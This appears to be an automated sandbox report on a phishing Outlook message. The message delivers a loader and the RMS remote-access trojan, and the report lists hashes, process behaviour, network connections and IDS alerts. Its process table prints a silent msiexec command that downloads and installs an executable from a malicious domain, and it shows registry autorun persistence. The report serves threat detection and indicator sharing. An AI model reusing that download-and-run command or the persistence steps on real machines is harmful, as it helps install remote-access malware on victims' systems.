analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0aa4_12e4_241de41b_52ff_45bb_96d5_83c60ff98b85.eml (73.1 KB).msg

Full analysis: https://app.any.run/tasks/bf22a490-823d-424d-8cb6-2c44c4a057b7
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 18:16:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
rat
rms
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

99CA464368FF7DF079FAF1F2AAE41A5B

SHA1:

2D7E388E159ED91AD02A891437DE77639FA0015F

SHA256:

0D507866E42242F28E5D41C4AD77BA4176ED627CDDCF932BBCE36D67B0A735AC

SSDEEP:

1536:V97YBd0pwlTa9oDhD2wr9rkIepWgD28S5GxvSt3y83D2hjNxqb8Ni:V978nWDw5r8pWglKt3R4jXS8N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • OUTLOOK.EXE (PID: 2936)
    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 2308)
    • Application was dropped or rewritten from another process

      • WMIsvc.exe (PID: 1480)
      • exit.exe (PID: 3392)
      • btc.exe (PID: 1664)
      • exit.exe (PID: 2160)
      • winserv.exe (PID: 3692)
    • Loads dropped or rewritten executable

      • cmd.exe (PID: 3868)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2304)
    • Changes the autorun value in the registry

      • reg.exe (PID: 3024)
    • RMS RAT was detected

      • winserv.exe (PID: 3692)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2936)
      • winserv.exe (PID: 3692)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2936)
    • Starts Internet Explorer

      • OUTLOOK.EXE (PID: 2936)
    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 2936)
      • WINWORD.EXE (PID: 2308)
    • Application launched itself

      • WINWORD.EXE (PID: 2308)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2304)
      • WMIsvc.exe (PID: 1480)
      • cmd.exe (PID: 3868)
      • btc.exe (PID: 1664)
    • Starts CMD.EXE for commands execution

      • exit.exe (PID: 3392)
      • exit.exe (PID: 2160)
    • Creates files in the program directory

      • btc.exe (PID: 1664)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3348)
    • Reads Environment values

      • winserv.exe (PID: 3692)
    • Reads the machine GUID from the registry

      • winserv.exe (PID: 3692)
    • Reads Windows Product ID

      • winserv.exe (PID: 3692)
    • Connects to unusual port

      • winserv.exe (PID: 3692)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3348)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 3700)
      • iexplore.exe (PID: 3960)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2112)
      • iexplore.exe (PID: 2768)
    • Changes internet zones settings

      • iexplore.exe (PID: 3700)
      • iexplore.exe (PID: 3960)
    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 2936)
      • WINWORD.EXE (PID: 2308)
      • WINWORD.EXE (PID: 996)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2112)
      • iexplore.exe (PID: 2768)
    • Creates files in the user directory

      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 2252)
      • iexplore.exe (PID: 2112)
      • WINWORD.EXE (PID: 2308)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 1388)
      • iexplore.exe (PID: 2768)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3700)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2304)
    • Creates a software uninstall entry

      • msiexec.exe (PID: 2304)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (38.9)
.oft | Outlook Form Template (22.7)
.doc | Microsoft Word document (17.5)
.xls | Microsoft Excel sheet (16.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
257
Monitored processes
221
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start outlook.exe iexplore.exe iexplore.exe flashutil32_26_0_0_131_activex.exe no specs iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs flashutil32_26_0_0_131_activex.exe no specs msiexec.exe no specs msiexec.exe wmisvc.exe exit.exe no specs cmd.exe ping.exe no specs ping.exe no specs btc.exe exit.exe no specs cmd.exe no specs reg.exe #RMS winserv.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\0aa4_12e4_241de41b_52ff_45bb_96d5_83c60ff98b85.eml (73.1 KB).msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3700"C:\Program Files\Internet Explorer\iexplore.exe" https://u6863864.ct.sendgrid.net/wf/click?upn=T8mg5Wan3CfUv57dm94kasU0NHyu9-2F65mSNJ3Bg1B5lcrjxPfT1SLrZg5imBDn0w_Hdb4rnHInm3Ozuypdsu9QmVcGyEM9YG7TYxcaIfW7JqTfNcDRs7X1q3nujGj3h5Tc7uQ5ayYvgY2Zj9ZtcD1MKhsjoh2SniGEV4iGqjLmR94pd-2F4LchL8Rg2eqPF97nKQIQUKcjkmEACANILu261cvAp8Rv-2FkoX5t6SdY8LlDI6elN1xJ-2F5zBVBKWgeeu98CZWdjAYeRetkr6XduyQtWoWU1uTk0-2F-2Fhh9nqRBltvVqU-3DC:\Program Files\Internet Explorer\iexplore.exe
OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2112"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3700 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2252C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Exit code:
0
Version:
26,0,0,131
3960"C:\Program Files\Internet Explorer\iexplore.exe" https://u6863864.ct.sendgrid.net/wf/click?upn=T8mg5Wan3CfUv57dm94kasU0NHyu9-2F65mSNJ3Bg1B5lcrjxPfT1SLrZg5imBDn0w_Hdb4rnHInm3Ozuypdsu9QmVcGyEM9YG7TYxcaIfW7JqTfNcDRs7X1q3nujGj3h5Tc7uQ5ayYvgY2Zj9ZtcD1MIu5GkuQBobWXU470BR8tpye59fhhtxT3-2FeSPYToGhQwCyLzZTNjSUqDKNAmRQpkohoLAEwPOXwMrUfZN-2B-2FnXGcV1uVgRsZ5MzWutDu85sEKrZHc9yfrnDa5XMv4qfR42lIQFQGqwNHa3s1PETQo7Gk-3DC:\Program Files\Internet Explorer\iexplore.exe
OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2768"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3960 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2308"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n /f "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\V5E7A3FM\receipt.wiz"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
996"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1388C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Version:
26,0,0,131
3400C:\Windows\System32\msiexec.exe VI=ssa EXE=DLL /q /norestart /i http://officesupportbox.com/WMIsvcC:\Windows\System32\msiexec.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Total events
5 893
Read events
4 817
Write events
0
Delete events
0

Modification events

No data
Executable files
8
Suspicious files
15
Text files
122
Unknown types
17

Dropped files

PID
Process
Filename
Type
2936OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRA498.tmp.cvr
MD5:
SHA256:
3700iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3700iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2112iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\reader[1].txt
MD5:
SHA256:
2936OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:3099F268D9A92623F3C3854C0256BF4F
SHA256:C104F48184285D9238F71E5EAF074E18FB43ACC40244DC0DFE67A78E5FBB5524
2936OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inftext
MD5:48DD6CAE43CE26B992C35799FCD76898
SHA256:7BFE1F3691E2B4FB4D61FBF5E9F7782FBE49DA1342DBD32201C2CC8E540DBD1A
2112iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@adobe[1].txttext
MD5:7E5613E22CFB5271B8FE21E1413C42AE
SHA256:1D70F29392106C08087E3A5DAE590707A21C3DD0AC65F02BDDC823DA62865E77
2112iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\PP6KS563\core[1].csstext
MD5:74E2840F54A24D44FFBBFEB38982BD14
SHA256:BCAF82197ACED5A87DA6C945A3F999C5BA3B323843B0AB7E0B3090B86AF818C0
2112iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\reset[1].csstext
MD5:8058750FB8B2A42F413E3D0DF5159D30
SHA256:49C3EB4BFC9445C97F5C0E419F186B403AE05B468D964E6A53BD43459C4779F7
2936OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_ADED8760A7AA1E43A8AD7054FE99DFD6.datxml
MD5:EEAA832C12F20DE6AAAA9C7B77626E72
SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
54
DNS requests
30
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2936
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
2112
iexplore.exe
GET
200
2.16.186.56:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
54.4 Kb
whitelisted
2768
iexplore.exe
GET
301
193.104.215.66:80
http://get.adobe.com/uk/reader/
unknown
html
244 b
whitelisted
2112
iexplore.exe
GET
301
192.147.130.63:80
http://get.adobe.com/uk/reader/
US
html
244 b
whitelisted
3700
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2304
msiexec.exe
GET
200
185.244.130.88:80
http://officesupportbox.com/WMIsvc
unknown
executable
3.57 Mb
malicious
2112
iexplore.exe
GET
200
52.222.163.220:80
http://x.ss2.us/x.cer
US
der
1.27 Kb
whitelisted
3960
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3700
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2112
iexplore.exe
167.89.115.54:443
u6863864.ct.sendgrid.net
SendGrid, Inc.
US
suspicious
2112
iexplore.exe
192.147.130.63:80
get.adobe.com
Adobe Systems Inc.
US
whitelisted
2112
iexplore.exe
192.147.130.63:443
get.adobe.com
Adobe Systems Inc.
US
whitelisted
2112
iexplore.exe
2.16.123.22:443
wwwimages2.adobe.com
Akamai International B.V.
whitelisted
2936
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
2112
iexplore.exe
54.164.20.167:443
fonts.adobe.com
Amazon.com, Inc.
US
unknown
2112
iexplore.exe
2.18.232.23:443
assets.adobedtm.com
Akamai International B.V.
whitelisted
2112
iexplore.exe
66.117.28.86:443
cm.everesttech.net
Adobe Systems Inc.
US
whitelisted
3700
iexplore.exe
193.104.215.66:443
get.adobe.com
Level 3 Communications, Inc.
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
u6863864.ct.sendgrid.net
  • 167.89.115.54
  • 167.89.118.35
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
get.adobe.com
  • 192.147.130.63
  • 193.104.215.66
whitelisted
wwwimages2.adobe.com
  • 2.16.123.22
whitelisted
fonts.adobe.com
  • 54.164.20.167
  • 52.22.166.234
whitelisted
assets.adobedtm.com
  • 2.18.232.23
whitelisted
static-fonts.adobe.com
  • 23.38.53.224
whitelisted
dpm.demdex.net
  • 54.154.86.186
  • 52.17.226.250
  • 54.76.214.247
  • 52.49.41.66
  • 54.154.98.49
  • 54.76.193.55
  • 54.194.25.183
  • 52.49.47.75
  • 52.17.182.129
  • 34.249.86.253
  • 52.16.89.247
  • 46.51.193.164
  • 34.251.231.74
  • 34.247.143.160
  • 54.246.133.167
  • 52.51.131.19
whitelisted
sstats.adobe.com
  • 172.82.236.67
whitelisted

Threats

PID
Process
Class
Message
2304
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
2304
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3692
winserv.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] RMS.RAT Request Code Message
1 ETPRO signatures available at the full report
Process
Message
winserv.exe
Error WTSQueryUserToken #1314
winserv.exe
08-11-2018_18:20:12:081#T:Error #20 @2